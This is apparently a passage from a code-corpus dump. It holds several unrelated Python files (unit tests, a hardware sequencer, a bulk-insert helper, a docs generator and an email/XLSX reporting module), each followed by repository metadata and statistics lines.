"text": str(datetime.now()),
},
]
mock_response = mock(libslack.http.client.HTTPResponse)
mock_response.status = 200
when(libslack.libssm).get_ssm_param(...).thenReturn("mock_webhook_id_123")
when(libslack.http.client.HTTPSConnection).request(...).thenReturn('ok')
when(libslack.http.client.HTTPSConnection).getresponse(...).thenReturn(mock_response)
status = libslack.call_slack_webhook(mock_sender, mock_topic, mock_attachments)
self.assertEqual(200, status)
verify(libslack.libssm, times=1).get_ssm_param(...)
| 30.577778 | 93 | 0.618459 | 143 | 1,376 | 5.762238 | 0.405594 | 0.032767 | 0.058252 | 0.050971 | 0.196602 | 0.072816 | 0 | 0 | 0 | 0 | 0 | 0.009891 | 0.265262 | 1,376 | 44 | 94 | 31.272727 | 0.805143 | 0.05814 | 0 | 0 | 0 | 0 | 0.093553 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 1 | 0.09375 | false | 0 | 0.15625 | 0 | 0.28125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d125096efcca0b9a0a62af6753f16babc40c446a | 6,134 | py | Python | doajtest/unit/test_bll_delete_application.py | gaybro8777/doaj | 27d9d98ce4f496ae52acbaba6ee8e42c84cf1a58 | [
"Apache-2.0"
] | 47 | 2015-04-24T13:13:39.000Z | 2022-03-06T03:22:42.000Z | doajtest/unit/test_bll_delete_application.py | gaybro8777/doaj | 27d9d98ce4f496ae52acbaba6ee8e42c84cf1a58 | [
"Apache-2.0"
] | 1,215 | 2015-01-02T14:29:38.000Z | 2022-03-28T14:19:13.000Z | doajtest/unit/test_bll_delete_application.py | gaybro8777/doaj | 27d9d98ce4f496ae52acbaba6ee8e42c84cf1a58 | [
"Apache-2.0"
] | 14 | 2015-11-27T13:01:23.000Z | 2021-05-21T07:57:23.000Z | import time
from parameterized import parameterized
from portality import constants
from doajtest.fixtures import JournalFixtureFactory, AccountFixtureFactory, ApplicationFixtureFactory
from doajtest.helpers import DoajTestCase, load_from_matrix
from portality import lock
from portality.bll import DOAJ
from portality.bll import exceptions
from portality.models import Journal, Account, Suggestion
def load_parameter_sets():
return load_from_matrix("delete_application.csv", test_ids=[])
EXCEPTIONS = {
"ArgumentException" : exceptions.ArgumentException,
"Locked" : lock.Locked,
"AuthoriseException" : exceptions.AuthoriseException,
"NoSuchObjectException" : exceptions.NoSuchObjectException
}
def check_locks(application, cj, rj, account):
if account is None:
return
account_id = account.id
application_id = None
cj_id = None
rj_id = None
if application is not None: application_id = application.id
if cj is not None: cj_id = cj.id
if rj is not None: rj_id = rj.id
if application_id is not None:
assert not lock.has_lock(constants.LOCK_APPLICATION, application_id, account_id)
if cj_id is not None:
assert not lock.has_lock(constants.LOCK_JOURNAL, cj_id, account_id)
if rj_id is not None:
assert not lock.has_lock(constants.LOCK_JOURNAL, rj_id, account_id)
class TestBLLDeleteApplication(DoajTestCase):
def setUp(self):
super(TestBLLDeleteApplication, self).setUp()
self.old_journal_save = Journal.save
def tearDown(self):
super(TestBLLDeleteApplication, self).tearDown()
Journal.save = self.old_journal_save
@parameterized.expand(load_parameter_sets)
def test_01_delete_application(self, name, application_type, account_type, current_journal, related_journal, raises):
###############################################
## set up
# create the test application (if needed), and the associated current_journal and related_journal in suitable states
application = None
cj = None
rj = None
if application_type == "found" or application_type == "locked":
application = Suggestion(**ApplicationFixtureFactory.make_application_source())
if current_journal == "none":
application.remove_current_journal()
elif current_journal == "not_found":
application.set_current_journal("123456789987654321")
elif current_journal == "found":
cj = Journal(**JournalFixtureFactory.make_journal_source())
cj.set_id(cj.makeid())
cj.save(blocking=True)
application.set_current_journal(cj.id)
elif current_journal == "locked":
cj = Journal(**JournalFixtureFactory.make_journal_source())
cj.set_id(cj.makeid())
cj.save(blocking=True)
application.set_current_journal(cj.id)
lock.lock(constants.LOCK_JOURNAL, cj.id, "otheruser")
if related_journal == "none":
application.remove_related_journal()
elif related_journal == "not_found":
application.set_related_journal("123456789987654321")
elif related_journal == "found":
rj = Journal(**JournalFixtureFactory.make_journal_source())
rj.set_id(rj.makeid())
rj.save(blocking=True)
application.set_related_journal(rj.id)
elif related_journal == "locked":
rj = Journal(**JournalFixtureFactory.make_journal_source())
rj.set_id(rj.makeid())
rj.save(blocking=True)
application.set_related_journal(rj.id)
lock.lock(constants.LOCK_JOURNAL, rj.id, "otheruser")
acc = None
if account_type != "none":
acc = Account(**AccountFixtureFactory.make_publisher_source())
if account_type == "not_permitted":
acc.remove_role("publisher")
if application_type == "locked":
thelock = lock.lock(constants.LOCK_APPLICATION, application.id, "otheruser")
# we can't explicitly block on the lock, but we can halt until we confirm it is saved
thelock.blockall([(thelock.id, thelock.last_updated)])
application_id = None
if application is not None:
if acc is not None:
application.set_owner(acc.id)
else:
application.set_owner("randomuser")
application.save(blocking=True)
application_id = application.id
elif application_type == "not_found":
application_id = "sdjfasofwefkwflkajdfasjd"
###########################################################
# Execution
svc = DOAJ.applicationService()
if raises != "":
with self.assertRaises(EXCEPTIONS[raises]):
time.sleep(1)
svc.delete_application(application_id, acc)
time.sleep(1)
check_locks(application, cj, rj, acc)
else:
svc.delete_application(application_id, acc)
# we need to sleep, so the index catches up
time.sleep(1)
# check that no locks remain set for this user
check_locks(application, cj, rj, acc)
# check that the application actually is gone
if application is not None:
assert Suggestion.pull(application.id) is None
# check that the current journal no longer has a reference to the application
if cj is not None:
cj = Journal.pull(cj.id)
assert cj.current_application is None
# check that the related journal has a record that the application was deleted
if rj is not None:
rj = Journal.pull(rj.id)
record = rj.related_application_record(application.id)
assert "status" in record
assert record["status"] == "deleted"
| 39.574194 | 124 | 0.622595 | 666 | 6,134 | 5.561562 | 0.202703 | 0.049136 | 0.026728 | 0.036447 | 0.301296 | 0.263229 | 0.175486 | 0.160367 | 0.160367 | 0.160367 | 0 | 0.009316 | 0.282524 | 6,134 | 154 | 125 | 39.831169 | 0.832311 | 0.08135 | 0 | 0.25 | 0 | 0 | 0.054387 | 0.012146 | 0 | 0 | 0 | 0 | 0.068966 | 1 | 0.043103 | false | 0 | 0.077586 | 0.008621 | 0.146552 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d127c47da3786d5826c5e41959a0d6dd2107d434 | 10,139 | py | Python | psdaq/psdaq/pyxpm/pvseq.py | JBlaschke/lcls2 | 30523ef069e823535475d68fa283c6387bcf817b | [
"BSD-3-Clause-LBNL"
] | 16 | 2017-11-09T17:10:56.000Z | 2022-03-09T23:03:10.000Z | psdaq/psdaq/pyxpm/pvseq.py | JBlaschke/lcls2 | 30523ef069e823535475d68fa283c6387bcf817b | [
"BSD-3-Clause-LBNL"
] | 6 | 2017-12-12T19:30:05.000Z | 2020-07-09T00:28:33.000Z | psdaq/psdaq/pyxpm/pvseq.py | JBlaschke/lcls2 | 30523ef069e823535475d68fa283c6387bcf817b | [
"BSD-3-Clause-LBNL"
] | 25 | 2017-09-18T20:02:43.000Z | 2022-03-27T22:27:42.000Z | import time
from psdaq.cas.seq import *
from psdaq.pyxpm.pvhandler import *
from p4p.nt import NTScalar
from p4p.server.thread import SharedPV
verbose = True
NSubSeq = 64
def _nwords(instr):
    # every sequence instruction occupies exactly one word of engine RAM
    return 1
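# Hedged example (not part of the original module) of a subsequence as it
# would be handed to Engine.cacheSeq()/insertSeq() below: sync twice at fixed
# rate 5, issue one control request, then branch back to the start. The
# instruction classes come from psdaq.cas.seq via the wildcard import above.
def _example_subseq():
    return [FixedRateSync(5, 1),
            FixedRateSync(5, 1),
            ControlRequest(1),
            Branch.unconditional(line=0)]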
class SeqCache(object):
def __init__(self, index, sz, instr):
self.index = index
self.size = sz
self.instr = instr
class Engine(object):
def __init__(self, id, reg):
self._id = id
self._reg = reg
self._jump = reg.find(name='SeqJump_%d'%id)[0]
self._ram = reg.find(name='SeqMem_%d'%id)[0].mem
self._caches = {} # instruction sequences committed to device
a = 0
self._caches[a] = SeqCache(0,3,[FixedRateSync(5,1),FixedRateSync(5,1),Branch.unconditional(line=0)])
self._ram [a ].set(FixedRateSync(5,1)._word())
self._ram [a+1].set(FixedRateSync(5,1)._word())
self._ram [a+2].set(Branch.unconditional(line=0)._word(a))
a = (1<<reg.seqAddrLen.get())-1
self._caches[a] = SeqCache(1,1,[Branch.unconditional(line=0)])
self._ram [a].set(Branch.unconditional(line=a)._word(a))
self._indices = 3 # bit mask of committed sequences
self._seq = [] # instruction sequence to be committed
def cacheSeq(self,val):
seq = []
try:
# Reconstitute the list of instructions
iiter = iter(val)
ninstr = next(iiter)
for i in range(ninstr):
nargs = next(iiter)
args = [ next(iiter) for i in range(6) ]
instr = args[0]
if instr == FixedRateSync.opcode:
seq.append(FixedRateSync(args[1],args[2]))
elif instr == ACRateSync.opcode:
seq.append(ACRateSync(args[1],args[2],args[3]))
elif instr == Branch.opcode:
if nargs == 1:
seq.append(Branch.unconditional(args[1]))
else:
seq.append(Branch.conditional(args[1],args[2],args[3]))
elif instr == CheckPoint.opcode:
seq.append(CheckPoint(0))
elif instr == ControlRequest.opcode:
seq.append(ControlRequest(args[1]))
except StopIteration:
pass
self._seq = seq
return len(seq)
def insertSeq(self):
rval = 0
aindex = -3
while True:
# Validate sequence (skip)
# Calculate memory needed
nwords = 0
for i in self._seq:
nwords = nwords + _nwords(i)
# Find memory range (just) large enough
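# Best-fit scan over the gaps between cached sequences: self._caches maps
# start address -> committed sequence, so the space between one entry's end
# (addr) and the next entry's start (key) is a free block. The smallest
# free block that still fits nwords wins; an exact fit ends the scan early.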
best_ram = 0
if True:
addr = 0
none_found = 1<<self._reg.seqAddrLen.get()
best_size = none_found
for key,cache in self._caches.items():
isize = key-addr
if verbose:
print('Found memblock {:x}:{:x} [{:x}]'.format(addr,key,isize))
if isize==nwords:
best_size = isize
best_ram = addr
break
elif isize > nwords and isize < best_size:
best_size = isize
best_ram = addr
addr = key+cache.size
if best_size == none_found:
print('BRAM space unavailable')
rval = -1
break
if verbose:
print('Using memblock {:x}:{:x} [{:x}]'.format(best_ram,best_ram+nwords,nwords))
if rval:
break
if self._indices == -1:
rval = -2
break
for i in range(NSubSeq):
if (self._indices & (1<<i))==0:
self._indices = self._indices | (1<<i)
aindex = i
break
print('Caching seq {} of size {}'.format(aindex,nwords))
self._caches[best_ram] = SeqCache(aindex,nwords,self._seq)
# Translate addresses
addr = best_ram
for i in self._seq:
if i.opcode == Branch.opcode:
jumpto = i.address()
if jumpto > len(self._seq):
rval = -3
elif jumpto >= 0:
jaddr = 0
for j,seq in enumerate(self._seq):
if j==jumpto:
break
jaddr += _nwords(seq)
self._ram[addr].set(i._word(jaddr+best_ram))
addr += 1
else:
self._ram[addr].set(i._word())
addr += 1
print('Translated addresses rval = {}'.format(rval))
if rval:
self.removeSeq(aindex)
break
if rval==0:
rval = aindex
return rval
def removeSeq(self, index):
if (self._indices & (1<<index))==0:
return -1
self._indices = self._indices & ~(1<<index)
# Lookup sequence
ram = self._reg.SeqMem_0.mem
for key,seq in self._caches.items():
if seq.index == index:
self._ram[key].set(key)
del self._caches[key]
return 0
return -2
def setAddress(self, seq, start, sync):
a = -1
for key,entry in self._caches.items():
if entry.index == seq:
a = key
for i in range(start):
a += _nwords(entry.instr[i])
break
if a>=0:
self._jump.setManStart(a,0)
self._jump.setManSync (sync)
print('sequence started at address 0x{:x}'.format(a))
else:
print('sequence {} failed to start'.format(seq))
def enable(self,e):
v = self._reg.seqEn.get()
if e:
v = v | (1<<self._id)
else:
v = v & ~(1<<self._id)
self._reg.seqEn.set(v)
def reset(self):
v = 1<<self._id
self._reg.seqRestart.set(v)
def dump(self):
v = self._jump.reg[15].get()
print('Sync [{:04x}] Start [{:04x}] Enable [{:08x}]'.format(v>>16,v&0xffff,self._reg.seqEn.get()))
state = self._reg.find(name='SeqState_%d'%self._id)[0]
cond = state.find(name='cntCond')
print("Req {:08x} Inv {:08x} Addr {:08x} Cond {:02x}{:02x}{:02x}{:02x}"
.format(state.find(name='cntReq') [0].get(),
state.find(name='cntInv') [0].get(),
state.find(name='currAddr') [0].get(),
cond[0].get(),
cond[1].get(),
cond[2].get(),
cond[3].get()))
for i in range(NSubSeq):
if (self._indices & (1<<i)):
print('Sequence %d'%i)
self.dumpSequence(i)
def dumpSequence(self,i):
for key,entry in self._caches.items():
if entry.index == i:
for j in range(entry.size):
print('[{:08x}] {:08x}'.format(key+j,self._ram[key+j].get()))
class PVSeq(object):
def __init__(self, provider, name, ip, engine):
self._eng = engine
self._seq = []
def addPV(label,ctype='I',init=0):
pv = SharedPV(initial=NTScalar(ctype).wrap(init),
handler=DefaultPVHandler())
provider.add(name+':'+label,pv)
return pv
self._pv_DescInstrs = addPV('DESCINSTRS','s','')
self._pv_InstrCnt = addPV('INSTRCNT')
self._pv_SeqIdx = addPV('SEQIDX' ,'aI',[0]*NSubSeq)
self._pv_SeqDesc = addPV('SEQDESC' ,'as',['']*NSubSeq)
self._pv_Seq00Idx = addPV('SEQ00IDX')
self._pv_Seq00Desc = addPV('SEQ00DESC' ,'s','')
self._pv_Seq00BDesc = addPV('SEQ00BDESC','as',['']*NSubSeq)
self._pv_RmvIdx = addPV('RMVIDX')
self._pv_RunIdx = addPV('RUNIDX')
self._pv_Running = addPV('RUNNING')
def addPV(label,ctype,init,cmd):
pv = SharedPV(initial=NTScalar(ctype).wrap(init),
handler=PVHandler(cmd))
provider.add(name+':'+label,pv)
return pv
self._pv_Instrs = addPV('INSTRS' ,'aI',[0]*16384, self.instrs)
self._pv_RmvSeq = addPV('RMVSEQ' , 'I', 0, self.rmvseq)
self._pv_Ins = addPV('INS' , 'I', 0, self.ins)
self._pv_SchedReset = addPV('SCHEDRESET', 'I', 0, self.schedReset)
self._pv_ForceReset = addPV('FORCERESET', 'I', 0, self.forceReset)
def instrs(self, pv, val):
pvUpdate(self._pv_InstrCnt,self._eng.cacheSeq(val))
def rmvseq(self, pv, pval):
val = self._pv_RmvIdx.current()['value']
print('rmvseq index %d'%val)
if val > 1 and val < NSubSeq:
self._eng.removeSeq(val)
pvUpdate(self._pv_Seq00Idx,0)
def ins(self, pv, val):
if val:
rval = self._eng.insertSeq()
pvUpdate(self._pv_Seq00Idx,rval)
def schedReset(self, pv, val):
if val:
idx = self._pv_RunIdx.current()['value']
print('Scheduling index {}'.format(idx))
pvUpdate(self._pv_Running,1 if idx>1 else 0)
self._eng.enable(True)
self._eng.setAddress(idx,0,1)
self._eng.reset()
def forceReset(self, pv, val):
if val:
idx = self._pv_RunIdx.current()['value']
print('Starting index {}'.format(idx))
pvUpdate(self._pv_Running,1 if idx>1 else 0)
self._eng.enable(True)
self._eng.setAddress(idx,0,0)
self._eng.reset()
def checkPoint(self,addr):
pvUpdate(self._pv_Running,0)
| 35.826855 | 134 | 0.483578 | 1,139 | 10,139 | 4.171203 | 0.187006 | 0.036624 | 0.00884 | 0.011577 | 0.226058 | 0.187539 | 0.154704 | 0.154704 | 0.11366 | 0.083351 | 0 | 0.024733 | 0.389881 | 10,139 | 282 | 135 | 35.953901 | 0.743291 | 0.026926 | 0 | 0.196653 | 0 | 0.004184 | 0.05997 | 0.002435 | 0 | 0 | 0.000609 | 0 | 0 | 1 | 0.083682 | false | 0.004184 | 0.020921 | 0.004184 | 0.150628 | 0.058577 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d12b265e15613a5740be8a1120b2616b639c765d | 2,345 | py | Python | bulky/functions/insert.py | tgrx/bulky | 8c5a41936b8ea29ed39b57ebe1a91bd85e64422d | [
"Apache-2.0"
] | null | null | null | bulky/functions/insert.py | tgrx/bulky | 8c5a41936b8ea29ed39b57ebe1a91bd85e64422d | [
"Apache-2.0"
] | 4 | 2020-03-24T17:19:39.000Z | 2021-06-01T23:47:33.000Z | bulky/functions/insert.py | tgrx/bulky | 8c5a41936b8ea29ed39b57ebe1a91bd85e64422d | [
"Apache-2.0"
] | null | null | null | from typing import Optional
import sqlalchemy as sa
from typeguard import typechecked
from bulky import consts
from bulky.internals import utils
from bulky.types import (
ReturningType,
RowsType,
SessionType,
TableType,
ValuesSeriesType,
)
@typechecked(always=True)
def insert(
session: SessionType,
table_or_model: TableType,
values_series: ValuesSeriesType,
returning: Optional[ReturningType] = None,
) -> RowsType:
"""
Inserts a series of values into DB.
Data are split into chunks.
Chunks are inserted sequentially.
No multiprocessing.
No multithreading.
No async IO.
The order of data elements is not preserved.
The order of returned rows is undefined.
Session is not flushed.
Inserted objects are not propagated to session.
Values are not validated against database type.
Default values on SqlAlchemy level are resolved and populated implicitly.
:param session: session from SqlAlchemy
:param table_or_model: a Table or Mapper or class inherited from declarative_base() call
:param values_series: a sequence of values in {column: value} format.
`column` may be:
* a name of a table column;
* a column attribute of a table / Mapper / Declarative;
:param returning: a sequence of elements representing table / Mapper / Declarative columns.
These columns, bound with values, will be returned after insert.
:return: a list of RowProxy.
If either no data are inserted or no returning requested, empty list will be returned.
"""
result: RowsType = []
if not values_series:
return result
table = utils.get_table(table_or_model)
returning_cleaned = utils.clean_returning(table, returning)
values_series_cleaned = utils.clean_values(table, values_series)
values_series_chunks = (
values_series_cleaned[i : i + consts.BULK_CHUNK_SIZE]
for i in range(0, len(values_series_cleaned), consts.BULK_CHUNK_SIZE)
)
for n_chunk, chunk in enumerate(values_series_chunks):
query = sa.insert(table, values=chunk, returning=returning_cleaned, inline=True)
query_result = session.execute(query)
if returning:
data = query_result.fetchall()
result.extend(data)
return result
| 28.597561 | 95 | 0.704904 | 296 | 2,345 | 5.472973 | 0.405405 | 0.066667 | 0.022222 | 0.023457 | 0.02716 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000557 | 0.234968 | 2,345 | 81 | 96 | 28.950617 | 0.902453 | 0.44307 | 0 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.166667 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d12ec155ae9ab0387d7e7cd3e2162068051e9976 | 3,357 | py | Python | docs/scripts/gen_mds.py | RushivArora/gym-docs | 7c9714204fa680af0b07b4f19cd01726007595f4 | [
"MIT"
] | null | null | null | docs/scripts/gen_mds.py | RushivArora/gym-docs | 7c9714204fa680af0b07b4f19cd01726007595f4 | [
"MIT"
] | null | null | null | docs/scripts/gen_mds.py | RushivArora/gym-docs | 7c9714204fa680af0b07b4f19cd01726007595f4 | [
"MIT"
] | null | null | null | __author__ = "Sander Schulhoff"
__email__ = "sanderschulhoff@gmail.com"
from pydoc import doc
import gym
import os
from os import mkdir, path
import re
import numpy as np
from utils import trim
from utils import kill_strs
from tqdm import tqdm
LAYOUT = "env"
pattern = re.compile(r'(?<!^)(?=[A-Z])')
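# zero-width match before each interior capital letter, so for example
# pattern.sub('_', 'FrozenLake') -> 'Frozen_Lake'; lowercasing the result
# gives the snake_case name used for the file paths below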
gym.logger.set_level(gym.logger.DISABLED)
for env_spec in tqdm(gym.envs.registry.all()):
if any(x in str(env_spec.id) for x in kill_strs):
continue
try:
env = gym.make(env_spec.id)
split = str(type(env.unwrapped)).split(".")
env_type = split[2]
if env_type == 'atari' or env_type == 'unittest':
continue
# variants dont get their own pages
e_n = str(env_spec).lower()
docstring = env.unwrapped.__doc__
if not docstring:
docstring = env.unwrapped.__class__.__doc__
docstring = trim(docstring)
# pascal case
pascal_env_name = env_spec.id.split("-")[0]
snake_env_name = pattern.sub('_', pascal_env_name).lower()
title_env_name = snake_env_name.replace("_", " ").title()
env_type_title = env_type.replace("_", " ").title()
# path for saving the generated markdown page
v_path = os.path.join(os.path.dirname(__file__), "..", "source", "environments", env_type, snake_env_name + ".md")
front_matter = f"""---
AUTOGENERATED: DO NOT EDIT FILE DIRECTLY
title: {title_env_name}
---
"""
title = f"# {title_env_name}"
gif = "```{figure}" + f" ../../_static/videos/{env_type}/{snake_env_name}.gif" + f" \n:width: 200px\n:name: {snake_env_name}\n```"
info = f"This environment is part of the <a href='..'>{env_type_title} environments</a>. Please read that page first for general information."
env_table = f"| | |\n|---|---|\n"
env_table += f"| Action Space | {env.action_space} |\n"
if env.observation_space.shape:
env_table += f"| Observation Shape | {env.observation_space.shape} |\n"
if hasattr(env.observation_space, "high"):
high = env.observation_space.high
if hasattr(high, "shape"):
if len(high.shape) == 3:
high = high[0][0][0]
high = np.round(high, 2)
high = str(high).replace("\n", " ")
env_table += f"| Observation High | {high} |\n"
if hasattr(env.observation_space, "low"):
low = env.observation_space.low
if hasattr(low, "shape"):
if len(low.shape) == 3:
low = low[0][0][0]
low = np.round(low, 2)
low = str(low).replace("\n", " ")
env_table += f"| Observation Low | {low} |\n"
else:
env_table += f"| Observation Space | {env.observation_space} |\n"
env_table += f"| Import | `gym.make(\"{env_spec.id}\")` | \n"
if docstring is None:
docstring = "No information provided"
all_text = f"""{front_matter}
{title}
{gif}
{info}
{env_table}
{docstring}
"""
file = open(v_path, "w", encoding="utf-8")
file.write(all_text)
file.close()
except Exception as e:
print(e)
| 31.083333 | 150 | 0.548406 | 419 | 3,357 | 4.178998 | 0.331742 | 0.039977 | 0.035979 | 0.022844 | 0.105083 | 0.065106 | 0 | 0 | 0 | 0 | 0 | 0.006891 | 0.308311 | 3,357 | 107 | 151 | 31.373832 | 0.747201 | 0.019958 | 0 | 0.051282 | 0 | 0.012821 | 0.244979 | 0.053561 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.128205 | 0 | 0.128205 | 0.012821 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d12eebaeb7581a5a1c21063a28bdfc7ae9b1cb5d | 13,247 | py | Python | cas_admin/email_utils.py | path-cc/credit-account-reporting | 7a4f3e6ce81ad7e11b567c48294eb1ad5f68697e | [
"MIT"
] | null | null | null | cas_admin/email_utils.py | path-cc/credit-account-reporting | 7a4f3e6ce81ad7e11b567c48294eb1ad5f68697e | [
"MIT"
] | null | null | null | cas_admin/email_utils.py | path-cc/credit-account-reporting | 7a4f3e6ce81ad7e11b567c48294eb1ad5f68697e | [
"MIT"
] | 1 | 2022-03-02T21:14:59.000Z | 2022-03-02T21:14:59.000Z | import click
import xlsxwriter
import json
import smtplib
import dns.resolver
from operator import itemgetter
from collections import OrderedDict
from datetime import timedelta
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
from pathlib import Path
from cas_admin.account import get_account_data, get_charge_data
def send_email(
from_addr,
to_addrs=[],
subject="",
replyto_addr=None,
cc_addrs=[],
bcc_addrs=[],
attachments=[],
html="",
):
if len(to_addrs) == 0:
click.echo("No recipients in the To: field, not sending email", err=True)
return
msg = MIMEMultipart()
msg["From"] = from_addr
msg["To"] = ", ".join(to_addrs)
if len(cc_addrs) > 0:
msg["Cc"] = ", ".join(cc_addrs)
if len(bcc_addrs) > 0:
msg["Bcc"] = ", ".join(bcc_addrs)
if replyto_addr is not None:
msg["Reply-To"] = replyto_addr
msg["Subject"] = subject
msg.attach(MIMEText(html, "html"))
for attachment in attachments:
path = Path(attachment)
part = MIMEBase("application", "octet-stream")
with path.open("rb") as f:
part.set_payload(f.read())
encoders.encode_base64(part)
part.add_header("Content-Disposition", "attachment", filename=path.name)
msg.attach(part)
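# Deliver directly to each recipient's mail exchanger: resolve the MX
# records for the recipient's domain and try each listed server in turn
# until one accepts the message (no local relay is assumed).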
for recipient in to_addrs + cc_addrs + bcc_addrs:
domain = recipient.split("@")[1]
sent = False
result = None
for mx in dns.resolver.query(domain, "MX"):
mailserver = str(mx).split()[1][:-1]
try:
smtp = smtplib.SMTP(mailserver)
result = smtp.sendmail(from_addr, recipient, msg.as_string())
smtp.quit()
# sendmail returns a dict of refused recipients; an empty dict means success
if result:
click.echo(
f"WARNING: Got result: {result} from {mailserver}", err=True
)
else:
sent = True
except Exception:
click.echo(
f"WARNING: Could not send to {recipient} using {mailserver}",
err=True,
)
if sent:
break
else:
click.echo(
f"ERROR: Could not send to {recipient} using any mailserver", err=True
)
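# Minimal usage sketch for send_email (illustrative only: the addresses and
# the attachment path below are hypothetical, not part of this module):
#
#     send_email(
#         from_addr="reports@example.org",
#         to_addrs=["owner@example.org"],
#         subject="Weekly account report",
#         html="<p>See attached.</p>",
#         attachments=["weekly_accounts_reports/report.xlsx"],
#     )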
def generate_weekly_accounts_report(
es_client,
starting_week_date,
xlsx_directory=Path("./weekly_accounts_reports"),
index="cas-credit-accounts",
):
"""Return HTML and XSLX report of per-account credits used and remaining"""
columns = OrderedDict()
columns["account_id"] = "Account Name"
columns["type"] = "Account Type"
columns["owner"] = "Account Owner"
columns["percent_credits_used"] = "% Credits Used"
columns["total_credits"] = "Total Credits"
columns["total_charges"] = "Total Charges"
columns["remaining_credits"] = "Remaining Credits"
date_str = str(starting_week_date)
xlsx_directory.mkdir(parents=True, exist_ok=True)
xlsx_file = xlsx_directory / f"cas-weekly-account-report_{date_str}.xlsx"
html = """<html>
<head>
</head>
<body style="background-color: white">
<table style="border-collapse: collapse">
"""
workbook = xlsxwriter.Workbook(str(xlsx_file))
worksheet = workbook.add_worksheet()
xlsx_header_fmt = workbook.add_format({"text_wrap": True, "align": "center"})
xlsx_date_fmt = workbook.add_format({"num_format": "yyyy-mm-dd"})
xlsx_numeric_fmt = workbook.add_format({"num_format": "#,##0"})
xlsx_percent_fmt = workbook.add_format({"num_format": "#,##0.00%"})
def row_style(i):
if i % 2 == 1:
return "background-color: #ddd"
return "background-color: white"
def col_html(x):
try:
x = float(x)
return f"""<td style="text-align: right; border: 1px solid black">{x:,.1f}</td>"""
except ValueError:
return f"""<td style="text-align: left; border: 1px solid black">{x}</td>"""
# Write header
i_row = 0
html += f"""<tr style="{row_style(0)}">\n"""
for i_col, (column_id, column_name) in enumerate(columns.items()):
html += f"""<th style="text-align: center; border: 1px solid black">{column_name}</th>"""
worksheet.write(i_row, i_col, column_name, xlsx_header_fmt)
html += "</tr>\n"
# Get row data
addl_cols = ["percent_credits_used", "remaining_credits"]
rows = get_account_data(es_client, addl_cols=addl_cols, index=index)
# Add row data to html and xlsx
for i_row, row in enumerate(rows, start=1):
html += f"""<tr style="{row_style(i_row)}">\n"""
for i_col, col in enumerate(columns):
val = row[col]
if col == "percent_credits_used":
html += f"""<td style="text-align: right; border: 1px solid black">{val:.1%}</td>"""
worksheet.write(i_row, i_col, val, xlsx_percent_fmt)
else:
html += col_html(val)
try:
worksheet.write(i_row, i_col, float(val), xlsx_numeric_fmt)
except ValueError:
worksheet.write(i_row, i_col, val)
html += "</tr>\n"
html += """</table>
</body>
</html>
"""
workbook.close()
return {"html": html, "xlsx_file": xlsx_file}
def generate_weekly_account_owner_report(
es_client,
account,
starting_week_date,
xlsx_directory=Path("./weekly_account_reports_by_account"),
snapshot_directory=Path("./weekly_accounts_snapshots"),
account_index="cas-credit-accounts",
charge_index="cas-daily-charge-records-*",
):
"""Return HTML and XSLX report of per-account credits used and remaining"""
# Set up global report stuff
date_str = str(starting_week_date)
xlsx_directory = xlsx_directory / account
xlsx_directory.mkdir(parents=True, exist_ok=True)
xlsx_file = xlsx_directory / f"cas-weekly-account-report_{date_str}.xlsx"
html = """<html>
<head>
</head>
<body style="background-color: white">
"""
workbook = xlsxwriter.Workbook(str(xlsx_file))
xlsx_header_fmt = workbook.add_format({"text_wrap": True, "align": "center"})
xlsx_date_fmt = workbook.add_format({"num_format": "yyyy-mm-dd"})
xlsx_numeric_fmt = workbook.add_format({"num_format": "#,##0.0"})
xlsx_percent_fmt = workbook.add_format({"num_format": "#,##0.0%"})
xlsx_delta_fmt = workbook.add_format({"num_format": "+#,##0.0;-#,##0.0;0"})
def row_style(i):
if i % 2 == 1:
return "background-color: #ddd"
return "background-color: white"
def col_style(x):
try:
x = float(x)
return f"""<td style="text-align: right; border: 1px solid black; padding: 4px">{x:,.1f}</td>"""
except ValueError:
return f"""<td style="text-align: left; border: 1px solid black; padding: 4px">{x}</td>"""
# First create the account report
account_columns = OrderedDict()
account_columns["account_id"] = "Account Name"
account_columns["type"] = "Account Type"
account_columns["percent_credits_used"] = "% Credits Used"
account_columns["total_credits"] = "Total Credits"
account_columns["total_charges"] = "Total Charges"
account_columns["remaining_credits"] = "Remaining Credits"
account_columns["owner"] = "Account Owner"
account_columns["owner_email"] = "Account Owner Email"
account_worksheet = workbook.add_worksheet("Account summary")
html += """<h1>Account summary</h1>
<table style="border-collapse: collapse">\n"""
# Write header
i_row = 0
html += f"""<tr>\n"""
for i_col, (column_id, column_name) in enumerate(account_columns.items()):
